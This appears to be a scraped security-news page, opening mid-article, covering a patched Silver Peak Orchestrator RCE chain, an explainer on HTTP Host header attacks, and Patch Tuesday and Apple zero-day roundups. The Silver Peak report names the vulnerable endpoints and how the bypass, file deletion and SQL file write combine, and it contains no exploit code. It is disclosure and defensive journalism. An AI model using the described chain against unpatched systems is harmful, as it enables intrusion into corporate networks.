Combining these flaws, security researchers from Realmode Labs found that attackers could run arbitrary code by finding a file being run by the web server and deleting it using the file delete path traversal issue, then recreating it through the SQL query execution endpoint, which triggered file execution.

“In the best case scenario, an attacker can use these vulnerabilities to intercept or steer traffic,” said Ariel Tempelhof, co-founder and CEO of the Tel Aviv-based cybersecurity firm, in a Medium post outlining the findings.

“However, if an attacker desires, they can instead shut down a company’s entire international network.”

This demonstrates the security risks posed by the “the centralized management paradigm”, Tempelhof and Yaar Hahn, co-researchers on the project, told The Daily Swig.

Silver Peak says there are currently around 2,000 deployments of Unity Orchestrator.

The findings are the first part of a four-part series of blog posts disclosing chained RCE exploits – all remedied – affecting leading SD-WAN products.

SD-WAN solutions simplify and optimize the management of WANs by decoupling networking hardware from its control mechanism.

The flaws

The researchers alighted on the authentication bypass after noticing “special treatment for API calls originating from localhost where no authentication is being performed”.

Then they discovered that requests with localhost as their HTTP Host header would satisfy this “easily forged” localhost check:

request.getBaseUri().getHost().equals(“localhost”)

This should have been “discovered and neutralized” during a pre-production security code review, said Tempelhof and Hahn.

Now accessible for remote attackers, certain API endpoints allowed the uploading of debug logs to an S3 bucket.

“This mechanism prepares the logs, uploads them and then deletes the locally hosted file,” said Tempelhof.

“The /gms/rest/debugFiles/delete endpoint performing the deletion does not check for path traversal, creating the ability to delete any file on the system (if permissions allow).”

Finally, an API endpoint for running arbitrary SQL queries was accessible only by localhost and could be readily executed remotely.

“The /gms/rest/sqlExecution endpoint can be leveraged to an arbitrary file write by utilizing an INTO DUMPFILE clause” that bars file overwriting, but the file delete path traversal bug can be exploited to delete then rewrite the file, said Tempelhof.

Remediation

Silver Peak urges users to upgrade to update their Orchestrator builds in its advisories for the authentication bypass (PDF), file delete path traversal (PDF), and arbitrary SQL query execution (PDF) flaws.

The California-based company, which was recently acquired by Hewlett-Packard Enterprise, was alerted to the vulnerabilities on August 9, and issued software updates addressing the flaws on October 30.

“We were very impressed by the Silver Peak SIRT team,” said the researchers. “They were very responsive and cooperative and were the first to fix the issues [of all four vendors].”

A Silver Peak spokesperson told The Daily Swig: “Silver Peak is committed to providing a high-level of security for our enterprise and service provider customers.

“We treat any reported vulnerability notifications seriously and we are committed to resolving any security concerns as quickly as possible.”

Want to know more about HTTP host header attacks?

Click here

Bookmark

ClosePlease login

HTTP Host header attacks

Steven Black (n0tst3)

12 November 2020

HTTP Host header attacks – What are they?

Lets discuss how misconfigurations and flawed business logic can expose websites to a variety of attacks via the HTTP Host header. We’ll outline the high-level methodology for identifying Host header vulnerabilities and demonstrate how you can exploit them. Finally, we’ll provide some general guidance on how you can protect your own websites against these kinds of attacks.

What is the HTTP Host header?

The HTTP Host header is a mandatory request header as of HTTP/1.1. It specifies the domain name that the client wants to access. For example, when a user visits https://portswigger.net/web-security, their browser will compose a request containing a Host header as follows:

GET /web-security HTTP/1.1 Host: portswigger.net

In some cases, such as when the request has been forwarded by an intermediary system, the Host value may be altered before it reaches the intended back-end component. We will discuss this scenario in more detail below.

What is the purpose of the HTTP Host header?

The purpose of the HTTP Host header is to help identify which back-end component the client wants to communicate with. If requests didn’t contain Host headers, or if the Host header was malformed in some way, this could lead to issues when routing incoming requests to the intended application.

Historically, this ambiguity didn’t exist because each IP address would only host content for a single domain. Nowadays, largely due to the ever-growing trend for cloud-based solutions and outsourcing much of the related architecture, it is common for multiple websites and applications to be accessible at the same IP address. This approach has also increased in popularity partly as a result of IPv4 address exhaustion.

When multiple applications are accessible via the same IP address, this is most commonly a result of one of the following scenarios.

Virtual hosting

One possible scenario is when a single web server hosts multiple websites or applications. This could be multiple websites with a single owner, but it is also possible for websites with different owners to be hosted on a single, shared platform. This is less common than it used to be, but still occurs with some cloud-based SaaS solutions.

In either case, although each of these distinct websites will have a different domain name, they all share a common IP address with the server. Websites hosted in this way on a single server are known as “virtual hosts”.

To a normal user accessing the website, a virtual host is often indistinguishable from a website being hosted on its own dedicated server.

Routing traffic via an intermediary

Another common scenario is when websites are hosted on distinct back-end servers, but all traffic between the client and servers is routed through an intermediary system. This could be a simple load balancer or a reverse proxy server of some kind. This setup is especially prevalent in cases where clients access the website via a content delivery network (CDN).

In this case, even though the websites are hosted on separate back-end servers, all of their domain names resolve to a single IP address of the intermediary component. This presents some of the same challenges as virtual hosting because the reverse proxy or load balancer needs to know the appropriate back-end to which it should route each request.

How does the HTTP Host header solve this problem?

In both of these scenarios, the Host header is relied on to specify the intended recipient. A common analogy is the process of sending a letter to somebody who lives in an apartment building. The entire building has the same street address, but behind this street address there are many different apartments that each need to receive the correct mail somehow. One solution to this problem is simply to include the apartment number or the recipient’s name in the address. In the case of HTTP messages, the Host header serves a similar purpose.

When a browser sends the request, the target URL will resolve to the IP address of a particular server. When this server receives the request, it refers to the Host header to determine the intended back-end and forwards the request accordingly.

What is an HTTP Host header attack?

HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as “Host header injection” attacks.

Off-the-shelf web applications typically don’t know what domain they are deployed on unless it is manually specified in a configuration file during setup. When they need to know the current domain, for example, to generate an absolute URL included in an email, they may resort to retrieving the domain from the Host header:

<a href="https://_SERVER['HOST']/support">Contact support</a>

The header value may also be used in a variety of interactions between different systems of the website’s infrastructure.

As the Host header is in fact user controllable, this practice can lead to a number of issues. If the input is not properly escaped or validated, the Host header is a potential vector for exploiting a range of other vulnerabilities, most notably:

Web cache poisoning
Business logic flaws in specific functionality
Routing-based SSRF
Classic server-side vulnerabilities, such as SQL injection

How do HTTP Host header vulnerabilities arise?

HTTP Host header vulnerabilities typically arise due to the flawed assumption that the header is not user controllable. This creates implicit trust in the Host header and results in inadequate validation or escaping of its value, even though an attacker can easily modify this using tools like Burp Proxy.

Even if the Host header itself is handled more securely, depending on the configuration of the servers that deal with incoming requests, the Host can potentially be overridden by injecting other headers. Sometimes website owners are unaware that these headers are supported by default and, as a result, they may not be treated with the same level of scrutiny.

In fact, many of these vulnerabilities arise not because of insecure coding but because of insecure configuration of one or more components in the related infrastructure. These configuration issues can occur because websites integrate third-party technologies into their architecture without necessarily understanding the configuration options and their security implications.

Exploiting HTTP Host header vulnerabilities for pen-testing

By now, you should have a good understanding of what the HTTP Host header is.

How to prevent HTTP Host header attacks

To prevent HTTP Host header attacks, the simplest approach is to avoid using the Host header altogether in server-side code. Double-check whether each URL really needs to be absolute. You will often find that you can just use a relative URL instead. This simple change can help you prevent web cache poisoning vulnerabilities in particular.

Other ways to prevent HTTP Host header attacks include:

Protect absolute URLs

When you have to use absolute URLs, you should require the current domain to be manually specified in a configuration file and refer to this value instead of the Host header. This approach would eliminate the threat of password reset poisoning, for example.

Validate the Host header

If you must use the Host header, make sure you validate it properly. This should involve checking it against a whitelist of permitted domains and rejecting or redirecting any requests for unrecognized hosts. You should consult the documentation of your framework for guidance on how to do this. For example, the Django framework provides the ALLOWED_HOSTS option in the settings file. This approach will reduce your exposure to Host header injection attacks.

Don’t support Host override headers

It is also important to check that you do not support additional headers that may be used to construct these attacks, in particular X-Forwarded-Host. Remember that these may be supported by default.

Whitelist permitted domains

To prevent routing-based attacks on internal infrastructure, you should configure your load balancer or any reverse proxies to forward requests only to a whitelist of permitted domains.

Be careful with internal-only virtual hosts

When using virtual hosting, you should avoid hosting internal-only websites and applications on the same server as public-facing content. Otherwise, attackers may be able to access internal domains via Host header manipulation.

Bookmark

ClosePlease login

November 2020 Patch Tuesday: Microsoft fixes actively exploited Windows Kernel flaw

RiSec.CJB

12 November 2020

On this November 2020 Patch Tuesday:

Microsoft has plugged 112 security holes, including an actively exploited one
Adobe has delivered security updates for Adobe Reader Mobile and Adobe Connect
Intel has dropped a huge stack of security advisories and patches
SAP has released 12 security notes and updated three previously released ones
Mozilla has fixed a critical vulnerability affecting Firefox, Firefox ESR, and Thunderbird

Microsoft’s updates

Microsoft plugged 112 CVE-numbered flaws in a variety of its products. Of these, 17 are Critical, 93 as Important, and two are Low in severity.

Microsoft has changed the way it describes fixed vulnerabilities, and the new advisories unfortunately hold less information than before – information that may be crucial for admins to asses which patches are to be prioritized.

So this month, the most information is available about CVE-2020-17087, a Windows Kernel privilege escalation vulnerability, because it’s being actively exploited in the wild (together with a Chrome bug) and because Google disclosed it on October 29, along with PoC exploit code.

“While not explicitly stated, the language used makes it seem the exploit is not yet widespread. However, considering there is a full analysis of the bug weeks before the patch, it will likely be incorporated into other exploits quickly,” noted Trend Micro Zero Day Initiative’s Dustin Childs.

He also picked out a few other interesting vulnerabilities fixed by Microsoft this November 2020 Patch Tuesday:

CVE-2020-17051 – a critical Windows Network File System RCE flaw requires no user interaction and calls for low attack complexity, and may be wormable
CVE-2020-17040 – a Windows Hyper-V Security feature bypass vulnerability
CVE-2020-17084 – a RCE in Microsoft Exchange Server

The Critical vulnerabilities fixed this month are found in various image and video extensions (HEIF, HEVC, Raw Image, AV1), which the Microsoft Store will automatically update for affected customers. Others affect the Windows Print Spooler, the Chakra Scripting Engine, Internet Explorer, Edge, and Azure Sphere.

Microsoft has also patched many other Important vulnerabilities in Azure Sphere this month but, as Childs pointed out, since IoT devices running Azure Sphere are connected to the Internet and check for updates every day, patches for those have likely already been seamlessly implemented.

Adobe’s updates

Adobe has published two security bulletins, both for important (but not critical) vulnerabilities in Adobe Reader Mobile and Adobe Connect.

The Adobe Reader Mobile update fixes a single information disclosure bug. The Adobe Connect updates, which fix two vulnerabilities that may allow arbitrary JavaScript execution in the browser, will be staggered: for hosted services, the update is already available, for on-premise deployments it will be available from November 13.

None of the vulnerabilities are under active attack and the affected products have historically not been a target for attackers, so admins can prioritize other more critical updates and leave these for last.

Intel’s updates

Intel took advantage of the November 2020 Patch Tuesday to released a mammoth batch of advisories, covering vulnerabilities in drivers, server boards, various software, firmware, drones, BIOS, and so on.

Some advisories link to updates, some announced that there will be no security updates because the product is discontinued.

Two advisories cover issues that are deemed critical:

For Intel CSME, SPS, TXE, AMT and DAL – among the fixed flaws is an out-of-bounds write flaw in IPv6 subsystem that may allow an unauthenticated user to potentially enable escalation of privileges via network access
For Intel Wireless Bluetooth products – one of the fixed flaws is an improper buffer restriction that may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

It also has to be noted that Intel has fixed two flaws that may allow new side-channel attacks that may result in the attacker accessing sensitive data on Intel CPUs.

SAP’s updates

For November 2020 Patch Tuesday, SAP released 12 security notes and updated three previously released ones (for SAP Solution Manager, SAP NetWeaver, SAP Bank Analyzer and SAP S/4HANA Financial Products).

The most critical patches are for missing authentication check vulnerabilities in SAP Solution Manager (an integrated end-to-end platform intended to assist users in adopting new developments, managing the application lifecycle, and running SAP solutions) and a RCE flaw in SAP Data Services (an enterprise-class solution for data integration, data quality, data profiling, and text data processing).

Mozilla’s updates

Mozilla has released security updates to address a critical vulnerability (CVE-2020-26950) in Firefox, Firefox ESR, and Thunderbird.

They did not reveal many details about it, only that it may result in an exploitable use-after-free condition and that it has been revealed by a participant in the recently held Tianfu Cup 2020 International Cybersecurity Contest.

Thats It for “now” – get updating!

Bookmark

ClosePlease login

Apple patches three actively exploited zero‑day flaws in iOS

RiSec.CJB

12 November 2020

Long list of vulnerable actively exploited devices

Apple has released patches of its own to fix three zero-day vulnerabilities under active attacks.

The trio of flaws, affecting a broad range of Apple’s products, also happened to be unearthed by the bug-hunting crew.

“Apple is aware of reports that an exploit for this issue exists in the wild,” reads the company’s security bulletin describing each of the three flaws.

Impacted Devices

iPhone 6s and later

iPod touch 7th generation

iPad Air 2 and later,

iPad mini 4 and later.

The Cupertino tech giant also issued security updates for the vulnerabilities across a range of its other products, including the Apple Watch with watchOS 5.3.9, 6.2.9, and 7.1, a supplemental update for its Mac products with macOS Catalina 10.15.7, as well as a fix for older devices running iOS 12.4.9.

Ben Hawkes, the technical lead of Google’s Project Zero, had this to say on Twitter:

Apple have fixed three issues reported by Project Zero that were being actively exploited in the wild. CVE-2020-27930 (RCE), CVE-2020-27950 (memory leak), and CVE-2020-27932 (kernel privilege escalation). The security bulletin is available here: https://t.co/4OIReajIp6
— Ben Hawkes (@benhawkes) November 5, 2020

Meanwhile, Shane Huntley of Google’s Threat Analysis Group tweeted that the exploitation of the vulnerabilities is targeted and seems to be related to the zero-days that have been uncovered over the past month.

An attacker could exploit it by creating a malicious application to disclose kernel memory; according to VULDB, exploitation needs to happen locally and requires a single authentication.

The third zero-day bug, tracked as CVE-2020-27932, is a kernel privilege escalation vulnerability. “A malicious application may be able to execute arbitrary code with kernel privileges,” Apple warned.

Computer Emergency Response Teams (CERT) from Hong Kong and Singapore issued alerts urging users of the affected Apple devices to apply the updates immediately. If you don’t have automatic updates enabled, you can update your iPhone and iPad manually by going to the Settings menu, then tapping General and going to the Software Update section.

Bookmark

ClosePlease login

1...777879 Page 78 of 79

<img class="tdb-logo-img" src="https://www.realinfosec.net/wp-content/uploads/2022/08/risec.png" alt="Logo" title="" data-eio="l" />

<img class="tdb-logo-img" src="https://www.realinfosec.net/wp-content/uploads/2022/08/risec.png" alt="Logo" title="" data-eio="l" />

DOCUMENT MANAGEMENT

RISK (S)

ABSTRACT

SOLUTION

DOCUMENTATION

Please login to bookmark

Please login to bookmark

Please login to bookmark

In this tutorial, you will learn how to install and configure a Postfix server to send email through Mandrill, or SendGrid.

Prerequisites

Installing Postfix

Configuring SMTP Usernames and Passwords

Securing Your Password and Hash Database Files

Configuring the Relay Server

OH! But what about configurations with other providers?

Settings for Mandrill

Settings for SendGrid

Please login to bookmark

Please login to bookmark

Here, in no particular, order are the 20+ best free security tools:

Maltego

OWASP Zed Attack Proxy (ZAP)

Samurai Web Testing Framework

Kali Linux

Fierce Domain Scan

The Harvester

Hping

John the Ripper

Nessus

NMap

OpenVPN

Ophcrack

OWASP Python Security Project

Wireshark

ModSecurity

Burp Suite

Metasploit

Aircrack-ng

TAILS

Qubes OS

Signal

And there you have it, 20+ of the best free sec tools available today.

Please login to bookmark

The flaws

Remediation

Want to know more about HTTP host header attacks?

Please login to bookmark

HTTP Host header attacks – What are they?

What is the HTTP Host header?

What is the purpose of the HTTP Host header?

Virtual hosting

Routing traffic via an intermediary

How does the HTTP Host header solve this problem?

What is an HTTP Host header attack?

How do HTTP Host header vulnerabilities arise?

Exploiting HTTP Host header vulnerabilities for pen-testing

How to prevent HTTP Host header attacks

Protect absolute URLs

Validate the Host header

Don’t support Host override headers

Whitelist permitted domains

Be careful with internal-only virtual hosts

Please login to bookmark

Microsoft’s updates

Adobe’s updates

Intel’s updates

SAP’s updates

Mozilla’s updates

Thats It for “now” – get updating!

Please login to bookmark

Long list of vulnerable actively exploited devices

Impacted Devices

Please login to bookmark

Editor Picks

Featured

Cyber Academy

ABOUT US

Social